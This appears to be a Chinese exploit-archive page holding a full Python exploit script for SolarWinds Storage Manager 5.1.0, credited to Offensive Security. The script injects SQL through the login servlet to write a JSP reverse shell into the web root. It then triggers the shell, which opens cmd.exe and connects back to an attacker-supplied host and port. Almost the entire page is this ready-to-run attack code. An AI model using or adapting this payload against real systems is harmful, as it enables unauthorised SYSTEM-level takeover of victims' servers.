扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 |
#!/usr/bin/python ###################################################################################### # Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit # Date: May 2nd 2012 # Author: muts # Version: SolarWinds Storage Manager 5.1.0 # Tested on: Windows 2003 # Archive Url : http://www.offensive-security.com/0day/solarshell.txt ###################################################################################### # Discovered by Digital Defence - DDIVRT-2011-39 ###################################################################################### import urllib, urllib2, cookielib import sys import random print "\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit" print "[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39" print "[*] Offensive Security - http://www.offensive-security.com\n" if (len(sys.argv) != 4): print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>" exit(0) rhost = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] filename = '' for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6): filename+=i filename +=".jsp" output_path= "c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/%s" %filename jsp = '''<%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os ) { this.is = is; this.os = os; } public void run() { BufferedReader in= null; BufferedWriter out = null; try { in= new BufferedReader( new InputStreamReader( this.is ) ); out = new BufferedWriter( new OutputStreamWriter( this.os ) ); char buffer[] = new char[8192]; int length; while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) { out.write( buffer, 0, length ); out.flush(); } } catch( Exception e ){} try { if( in != null ) in.close(); if( out != null ) out.close(); } catch( Exception e ){} } } try { Socket socket = new Socket( "''' + lhost +'''", '''+lport+'''); Process process = Runtime.getRuntime().exec( "cmd.exe" ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %>''' jsp = jsp.replace("\n","") jsp = jsp.replace("\t","") prepayload = "AAA' " prepayload += 'union select 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "%s"' % (jsp.encode('hex'),output_path) prepayload += "#" postpayload = "1' or 1=1#--" loginstate='checkLogin' password = 'OHAI' cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : prepayload,'password' : password}) print "[*] Sending evil payload" resp = opener.open("http://%s:9000/LoginServlet" %rhost, post_params) print "[*] Triggering shell" post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : postpayload,'password' : password}) resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params) resp = opener.open("http://%s:9000/%s"% (rhost,filename)) print "[*] Check your shell on %s %s\n" % (lhost,lport) # 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111 # 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100 |
体验盒子
